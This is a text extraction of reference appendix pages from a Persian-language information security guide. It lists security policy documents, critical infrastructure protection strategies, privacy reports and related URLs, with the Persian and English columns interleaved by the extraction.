‫ﻃﺮﺣــﻲ ﺩﺭ ﺧــﺼﻮﺹ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ‬ ‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ‪ ،‬ﺑـﻪ ﺟﻨﺒـﻪﻫـﺎﻱ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪:‬‬ ‫ﻣﺨﺘﻠﻔﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻛﻪ ﺍﺯ ﺟﻤﻠﺔ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ‬
‫ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪ :‬ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻃﺒﻘﻪﺑﻨﺪﻱ‬
‫‪The government's guidelines for the‬‬
‫‪development of the information society,‬‬
‫ﻭ ﻛﻨﺘﺮﻝ ﺳﺮﻣﺎﻳﻪ‪ ،‬ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﺍﻣﻨﻴﺖ ﻣﺤﻴﻄﻲ ﻭ ﻓﻴﺰﻳﻜـﻲ‪،‬‬
‫‪Minister for Innovation and Technologies,‬‬ ‫ﺍﻣﻨﻴــﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﻋﻤﻠﻴــﺎﺕ‪ ،‬ﻛﻨﺘــﺮﻝ ﺩﺳﺘﺮﺳــﻲ‪ ،‬ﺗﻮﺳــﻌﻪ ﻭ‬
‫‪Rome, June 2002.‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻢ‪ ،‬ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﻭ ﻣﺪﻳﺮﻳﺖ ﺗﺪﺍﻭﻡ ﻛﺴﺐ‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺍﻳﻦ ﺧﺼﻮﺹ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ‬ ‫ﻭ ﻛﺎﺭ‪.‬‬
‫ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺷﺎﻣﻞ ﺧﻼﺻﺔ ﺍﺟﺮﺍﻳﻲ ﻃﺮﺡ ﻣﻠـﻲ‬
‫ﺁﺧﺮﻳﻦ ﺑﺎﺯﻧﮕﺮﻱ ﺩﺭ ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺍﻧﺠﺎﻡ ﺷﺪﻩ‬
‫ﺍﻳﺘﺎﻟﻴﺎ ﺩﺭ ﺧﺼﻮﺹ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻭ ﺍﻋﻼﻡ ﺷﺪﻩ ﻛـﻪ ﺑـﺎﺯﻧﮕﺮﻱ ﺑﻌـﺪﻱ ﺩﺭ ﺳـﭙﺘﺎﻣﺒﺮ ‪ ۲۰۰۵‬ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪:‬‬
‫ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫‪http://www.innorazione.gov.it/eng/docu‬‬
‫‪menti/linee-guida-eng.pdf‬‬
‫ﻣﻄﺎﻟﺐ ﺑﻴﺸﺘﺮ ﺭﺍﺟﻊ ﺑـﻪ ﺑﺨـﺸﻬﺎﻱ ﺳـﻮﻡ ﻭ‬
‫ﻣﺮﺍﺟﻊ ﺍﻟﮕﻮﻫﺎ‪ ،‬ﻣﻮﺿﻮﻋﺎﺕ‪ ،‬ﻭ ﻣﻀﺎﻣﻴﻦ ﺳﻴﺎﺳـﺖ ﻓﻨـﺎﻭﺭﻱ‬ ‫‪(۴‬‬
‫ﭼﻬﺎﺭﻡ ﻛﻪ ﺑﺮ ﻣﻮﺍﺭﺩ ﻭ ﻗﻮﺍﻧﻴﻦ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ‬
‫ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺟﻬــﺎﻧﻲ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﻭ‬
‫ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻳﺎﻓﺖ‪:‬‬ ‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﻧﺪ‪:‬‬
‫‪http://www.markle.org/globalpolicy‬‬
‫ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻘﺮﺍﺭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪:‬‬ ‫‪(۱‬‬
‫ﺍﻳﻦ ﻧﻬﺎﺩ ﺑـﺮ ﻣـﺸﺎﺭﻛﺖ ﻣـﺆﺛﺮ ﻭ ﻋﻤﻠـﻲ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﺩ ﻭ ﺍﺯ‬ ‫‪http://ww.audit.nsw.gov.au/guides-bp/e-‬‬
‫‪govt-BPG.pdf‬‬
‫ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﻜﻞ ﻣﻲ ﮔﻴـﺮﺩ ﻭ‬
‫ﻳﻚ ﺗﻴﻢ ﻛﺎﺭ ﺍﺑﺰﺍﺭﻱ ﺑﺮ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺤﻠﻲ ﺍﺯ‬ ‫ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‪ ،‬ﺑﻬﺘﺮﻳﻦ ﻭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻓﻬﺮﺳﺖ ﻛﻨﺘـﺮﻝ ﺩﺭ‬
‫ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺩﻭﻟﺖ ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﺪ )ﮊﻭﺋﻦ ﺳﺎﻝ ‪.(۲۰۰۲‬‬ ‫ﻣﻮﺭﺩ ﺩﻭﻟﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺧﻮﺩ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ )‪ ۲۰‬ﺻـﻔﺤﻪ(‪ .‬ﻣﻄﺎﻟـﺐ ﻗﺎﺑـﻞ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ ITU‬ﺩﺭﺑﺮﮔﻴﺮﻧـﺪﺓ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺁﺩﺭﺳـﻬﺎﻱ‬ ‫‪(۵‬‬
‫ﺗﻮﺟــﻪ‪ :‬ﻓــﺼﻠﻬﺎﻳﻲ ﺩﺭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﻣﺤﺮﻣــﺎﻧﮕﻲ‪ ،‬ﺍﻣﻨﻴــﺖ ﻭ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺳﻴﺎﺳﺘﻲ ﻭ ﻧﻈﺎﺭﺗﻲ ﺍﺳﺖ‪:‬‬
‫ﻣــﺪﻳﺮﻳﺖ ﺍﻃﻼﻋــﺎﺕ ﻭ ﻓﻨــﺎﻭﺭﻱ )ﺍﺩﺍﺭﺓ ﻣﻤﻴــﺰﻱ ﻭﻟــﺰ ﺟﻨــﻮﺑﻲ‪،‬‬
‫‪http://www.itu.int/osg/spu/ni/security/link‬‬
‫‪s/policy.html‬‬ ‫ﺍﺳﺘﺮﺍﻟﻴﺎ‪ (٤٩٨‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪ ﻭ ﺭﻭﻳﻜﺮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪:٤٩٩‬‬
‫‪http://www.itu.int/ITU-D/e-strategy/internet/‬‬ ‫ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﺩﺭ ﺧﺼﻮﺹ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬ ‫‪(۲‬‬
‫ﺣﻴﺎﺗﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﻳﺎﺩﺩﺍﺷﺖ ﺗﻔﺎﻫﻢ ﺍﻋﺘﻤﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٥٠٠‬ﺟﻬﺎﻧﻲ‪:‬‬
‫ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ‪:‬‬
‫‪http://www.itu.int/ITU-D/e-‬‬
‫‪http://www.itu.int/osg/spu/ni/security/ind‬‬
‫‪strategy/MoU/world_e.html‬‬
‫‪ex.html‬‬
‫ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ :‬ﺍﺳﺘﺮﺍﺗﮋﻱ ﻓﻨﺎﻭﺭﻱ ﺑـﺮﺍﻱ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻛﺮﻩ ﻭ ﺑﺮﺯﻳﻞ ﺩﺭ ﻣﻴﺎﻥ ﺳﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﻧﻤﻮﻧـﻪﻫـﺎﻱ ﻗﺎﺑـﻞ‬


‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪:‬‬
‫ﺗﻮﺟﻪ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪http://www.itu.int/ITU-D/e-‬‬
‫‪strategy/publications-‬‬
‫‪articles/wmrcjune00/ntoko.html‬‬

‫‪499 E-Strategy‬‬
‫‪500 E-Trust‬‬ ‫‪498 Audit Office of New-South Wales, Australia‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٤٧٢

in Financial Transactions -Public Policy 2003 Australian Computer Crime and


Issues, June 2002, The World Bank. Security Survey.

Canadian Criminal Code, Part VI, Invasion


Global Dialogue E-Security: Risk Mitigation
of Privacy and Part IX, Offences against
in theFinancial Sector, The World Bank,
Integrator Group, September 25, 2002 rights of property.

Goodman E., Seymour, Hassebroek B., Claessens Stijn, Glaessner Thomas and
Pamela, King, Davis and Ozment, Andy, Klingebiel Daniela, E-Finance in Emerging
International Coordination to Increase the Markets: Is Leapfrogging Possible?
Security of Critical Network Infrastructures,
May 20-22, 2002, Seoul. Commission of the European Communities:
Network and Information Security: Proposal
for A European Policy Approach – Brussels,
Harrop, Mike, Creating Trust in Critical
Network Infrastructures –Canadian Case June 6, 2001.
Study, May 20-22, 2002, Seoul, Korea.
Commission of the European Communities:
Creating a Safer Information Society by
International Telecommunications Union-
Improving the Security of Information
Telecommunications Standardization Sector
Infrastructures and Combating Computer-
(ITU-T) – Lead Study Group 17 on
related Crime – eEurope 2002, Brussels,
Communications and Systems Security
(www.itu.int/ITU-T/). January 26, 2001.

Internet Security Alliance, Common Sense :‫ﻭﺯﺍﺭﺕ ﺩﺍﺩﮔﺴﺘﺮﻱ ﻛﺎﻧﺎﺩﺍ‬


Guide for Senior Managers – Top Ten www.canada.justice.gc.ca/en/cons/La-
Recommended Security Practices, July al/index.htm#toc
2002.
Dr Chae, Kijoon, Introduction to Critical
Keck, Richard and Satola, David, Entering Network Infrastructures, May 20-22, 2002,
the Grid Computing Marketplace – A Primer Seoul, Korea.
of Key Legal Issues, April 1, 2003.
Dr Lim, Chaeho, Creating Trust in Critical
Kellerman, Thomas, Mobile Risk Network Infrastructures: Korean Case Study,
Management: E-finance in the Wireless May 20-22, 2002, Seoul.
Environment, The World Bank, May 2002.
‫ﺳﻨﺪﻱ ﺩﺭ ﺧﺼﻮﺹ ﺍﺑﻌﺎﺩ ﻗﺎﻧﻮﻧﻲ ﺧـﺪﻣﺎﺕ ﺟﺎﻣﻌـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ‬
McCullagh, Declan, Will Canada’s ISPs ‫ﺑﻄﻮﺭ ﺧﺎﺹ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺑﺎﺯﺍﺭ ﺩﺍﺧﻠﻲ )ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ‬
become spies?, CNET News.com, August
27, 2002. :(‫ﺩﺭ ﻣﻮﺭﺩ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬

Monetary Authority of Singapore, European Union Directive 2000/31/EC


Technology Risk Management Guidelines
for Financial Institutions, February 28, 2003. :‫ﻳﻚ ﺳﻨﺪ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺧﺼﻮﺹ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍﻩ ﺩﻭﺭ‬

Official Journal of the European European Union Directive 97/33/EC


Communities – Council Resolution on a
common approach and specific actions in :‫ﺳﻨﺪﻱ ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
the area of network and information security,
January 28, 2002. European Union Directive 2002/58/EC

Official Journal of the European Glaessner, Thomas, Kellerman Tom, and


Communities – Council Resolution on the McNevin, Electronic Security: Risk Mitigation
٤٧٣ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﺷﺪﻩ ﺩﺭ ﻣﺠﻼﺕ ﺣﻘـﻮﻗﻲ ﻛـﻪ ﺑـﻪ ﺗﺤﻠﻴـﻞ ﻋﻤﻴـﻖﺗـﺮ ﻣـﺴﺎﺋﻞ‬ Implementation of the eEurope 2005 Action
Plan, February 18, 2003.
:‫ﻣﻲﭘﺮﺩﺍﺯﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ‬
http://www.spamlaws.com/
OECD Guidelines for the Security of
Information Systems and Networks –
‫ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴـﺖ ﻣﻌﻨـﻮﻱ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬WIPO
Towards a Culture of Security.
‫ﻋﻀﻮ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳـﺎﻧﺪﻩ ﻛـﻪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳـﺮ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ‬
:‫ﺍﺳﺖ‬ Privacy Amendment Act of Australia (Private
http://www.wipo.org/about- Sector)
- Act 2000
ip/en/ipworldwide/index.html.
Security of Internet Enabled Wireless
Devices, Wireless Task Force Findings,
:‫ﻣﺮﺟﻊ ﺍﺻﻠﻲ ﭘﺎﻭﺭﻗﻲﻫﺎﻱ ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬ National Security Telecommunications
http://www.usdoj.gov/04foia/privstat.htm Advisory Committee, January 2003.

‫ﻳﻚ ﺑﺤﺚ ﻣﻔﺼﻠﺘﺮ ﭘﻴﺮﺍﻣﻮﻥ ﻣﺴﺎﺋﻞ ﺣﻘﻮﻗﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺭﺍ‬


Shaw, Robert, Creating Trust in Critical
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻴﺎﺑﻴﺪ ﻛﻪ ﻧﺎﻳﺎﺏ ﺍﺳﺖ ﺍﻣـﺎ ﻧـﺴﺨﻪﻫـﺎﻱ‬ Network Infrastructures: The Case of Brazil,
:‫ﻗﺪﻳﻤﻲ ﺁﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﭘﻴﺪﺍ ﻛﺮﺩ‬ May 20-22, 2002, Seoul.
Computer Crime: ACrimefighter’s Handbook
(O’Reilly). The National Strategy to Secure
Cyberspace, President’s Critical
‫ﮔﺮﻭﻩ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺟﻬﺎﻧﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﻣﻨـﺎﺑﻊ ﺯﻳـﺎﺩﻱ ﺩﺭ‬ Infrastructure Board, United States,
September 2002.
:‫ ﺩﺍﺭﺩ‬ICT ‫ﺗﻤﺎﻣﻲ ﺑﺨﺸﻬﺎﻱ ﻣﺆﺛﺮ ﺑﺮ ﺗﻮﺳﻌﺔ‬
http://www.internetpolicy.net Wireless Security, Wireless Task Force
Report, National Security
The National Strategy to Secure Cyberspace Telecommunications Advisory Committee,
[United States], February 2003, January 2003.
http://www.whitehouse.gov/pcipb/

Office of Critical Infrastructure Protection ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬


andEmergency Preparedness (OCIPEP)
http://www.ocipep.gc.ca/home/index_e.asp Annual Survey by EPIC and Privacy
International, Privacy and Human Rights
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻣﻄﻠﻊ ﺷﻮﻳﺪ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﺴﺎﺋﻞ‬ 2003 (Sept. 2003)
http://www.privacyinternational.org/survey/p
:‫ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‬،‫ﺯﻳﺮﺑﻨﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ‬
hr2003/
International Critical Information
InfrastructureProtection Handbook, edited by ‫ﻳﻚ ﮔﺰﺍﺭﺵ ﻣﻔﺼﻞ ﺩﺭﻣﻮﺭﺩ ﺷﺮﺍﻳﻂ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﺟﻬﺎﻥ‬
Andreas Wenger, Jan Metzger and Myriam
Dunn, Center for Security Studiesand :‫ﻛﻪ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﮊﺍﭘﻦ ﺭﻭﻱ ﺁﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ‬
Conflict Research, Swiss Federal Institute of
Technology (2002) Japanese Ministry of Public Management,
http://www.isn.ethz.ch/crn Home Affairs, Posts and
‫ﺑﺨﺶ ﺷﺸﻢ‬

Telecommunications. The Global Privacy


‫ﻭﺯﺍﺭﺕ ﻛﺸﻮﺭ ﺑﺮﻳﺘﺎﻧﻴﺎ ﻳﻚ ﻣﺮﻛﺰ ﻫﻤﺎﻫﻨﮕﻲ ﺍﻣﻨﻴﺖ ﺯﻳﺮﺑﻨﺎﻱ ﻣﻠﻲ‬ Report, August 14, 2003.
‫( ﺗﺄﺳﻴﺲ ﻛﺮﺩﻩ ﺗـﺎ ﺩﺭ ﺁﻥ ﺑـﻪ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﻣـﺪﻳﺮﻳﺖ‬NISCC) http://joi.ito.com/joiwiki/privacyReport

‫ ﺩﺭ ﺍﻋــﻼﻡ‬،‫ﻣــﺴﺎﺋﻞ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺣﻴــﺎﺗﻲ ﺑﭙــﺮﺩﺍﺯﺩ‬ ‫ﺭﺍﻫﻬﺎﻱ ﺩﺭﻳﺎﻓـﺖ ﻗـﻮﺍﻧﻴﻦ ﺿـﺪﻫﺮﺯﻧﺎﻣﻪ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬
‫ ﻭ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻭﻟـﺖ‬،‫ﻫﺸﺪﺍﺭ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺣﻤﻼﺕ ﻛﻤﻚ ﻛﻨﺪ‬ ‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻘﺎﻻﺕ ﭼـﺎﭖ‬
.‫ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺖ ﺭﺍ ﺗﺴﻬﻴﻞ ﻧﻤﺎﻳﺪ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٤٧٤

U.S. Presidential Decision Directive 62: ‫ ﻳﻚ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﻪ ﻧـﺎﻡ‬NISCC ‫ﺩﺭ‬
http://www.fas.org/irp/offdocs/pdd-62.htm
‫ ﻳــﻚ ﮔــﺮﻭﻩ ﻭﺍﻛــﻨﺶ ﺑــﻪ ﺣﻤــﻼﺕ‬.‫ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‬UNIRAS
E.O. 13228, Establishing the Office of ‫ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺗـﺎ‬NISCC ‫ ﻧﻴـﺰ ﺩﺭ‬٥٠١(EARG) ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
Homeland Security and the Homeland ‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ‬
Security Council, October 8, 2001,
http://fas.org/irp/offdocs/eo/eo-13228.htm;
‫ ﺍﻃﻼﻋـﺎﺕ‬UNIRAS .‫ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨﺪ‬
‫ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﺁﮔﺎﻫﻲ ﺑﺨﺶ ﺭﺍ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺑﺨـﺸﻬﺎﻱ ﻓﻌـﺎﻝ‬
E.O.13231, Critical Infrastructure Protection NISCC ‫ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬.‫ﺗﺠﺎﺭﻱ ﺩﺭ ﺑﺮﻳﺘﺎﻧﻴـﺎ ﺍﺭﺍﺋـﻪ ﻣـﻲ ﺩﻫـﺪ‬
in the Information Age, October 16, 2001:
http://www.ciao.gov/News/EOonCriticalInfras ‫( ﻧﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺮﻭﺣﻲ ﺩﺭ ﻣـﻮﺭﺩ‬http://www.niscc.gov.uk)
trutureProtection101601.html .‫ﺭﺍﻫﺒﺮﺩ ﺩﻭﻟﺖ ﺑﺮﻳﺘﺎﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬
The National Strategy to Secure
Cyberspace, Feb. 14, 2003, ‫ ﻧﻬﺎﺩﻫـﺎﻱ ﻏﻴﺮﺩﻭﻟﺘـﻲ‬،‫ ﻣﺆﺳﺴﺎﺕ ﺍﺟﺮﺍﻳـﻲ‬،‫ﻃﺒﻖ ﻗﺎﻧﻮﻥ ﺍﺳﺘﺮﺍﻟﻴﺎ‬
http://www.dhs.gov/interweb/assetlibrary/Nat ‫ ﺍﻳـﻦ‬.‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳـﻂ ﻧﻤﺎﻳﻨـﺪﺓ ﺩﻭﻟـﺖ ﺗﺄﺳـﻴﺲ ﻣـﻲﺷـﻮﻧﺪ‬
ional_Cyberspace_Strategy.pdf.
‫ﻻ ﻣﺆﺳـﺴﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻋﻤﻠﻜﺮﺩﺷـﺎﻥ ﺑﺎﻳـﺪ‬ ‫ﻣﺆﺳﺴﺎﺕ ﻣﻌﻤﻮ ﹰ‬
The National Strategy to Secure ‫ﻭﺳﻌﺘﻲ ﺩﺭ ﺣﺪ ﺩﻭﻟﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣـﺎﻝ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ‬
Cyberspace; by The National Strategy for
the Physical Protection of Critical
‫ ﻣﺪﻳﺮ ﻳـﻚ ﻣﺆﺳـﺴﻪ‬.‫ﺑﺎﺷﻨﺪ ﻛﻪ ﺍﺯ ﺩﻭﻟﺖ ﻣﺮﻛﺰﻱ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ‬
Infrastructures and Key Assets, released ‫ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻭﺯﻳﺮ ﺍﻧﺘﺨﺎﺏ ﻣﻲﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﺎﻥ ﻭﺯﻳـﺮ‬
March 4, 2003, .‫ ﻭﺯﺍﺭﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ( ﻧﻴﺰ ﭘﺎﺳﺨﮕﻮ ﺍﺳﺖ‬،‫)ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ‬
http://www.dhs.gov/interweb/assetlibrary/Ph
ysical_Strategy.pdf :‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‬
http://www.noie.gov.au/projects/confidence/p
Implementing components of The National rotecting/nat_agenda.htm.
Strategy for Homeland Security, issued by
the White House; July 16, 2002. International Critical Information
Infrastructure Protection Handbook, edited
European Commission, Proposal for a by Andreas Wenger, Jan Metzger and
Regulation of the European Parliament and Myriam Dunn, Center for Security Studies
of the Council Establishing the European and Conflict Research, Swiss Federal
Network and Information Security Agency, Institute of Technology (2002)
Feb.11, 2003, COM (2003) 63 final, http://www.isn.ethz.ch/crn
2003/0032 (COD):
http://europa.eu.int/information_society/eeurop ‫ﺑﺮﺍﻱ ﺍﻃﻼﻉ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﺍﺯ‬
e/action_plan/safe/documents/nisa_en.pdf
‫ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ‬،‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ‬
Council resolution of 28 Jan. 2002; :‫ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‬
European Commission, Communication International Critical Information
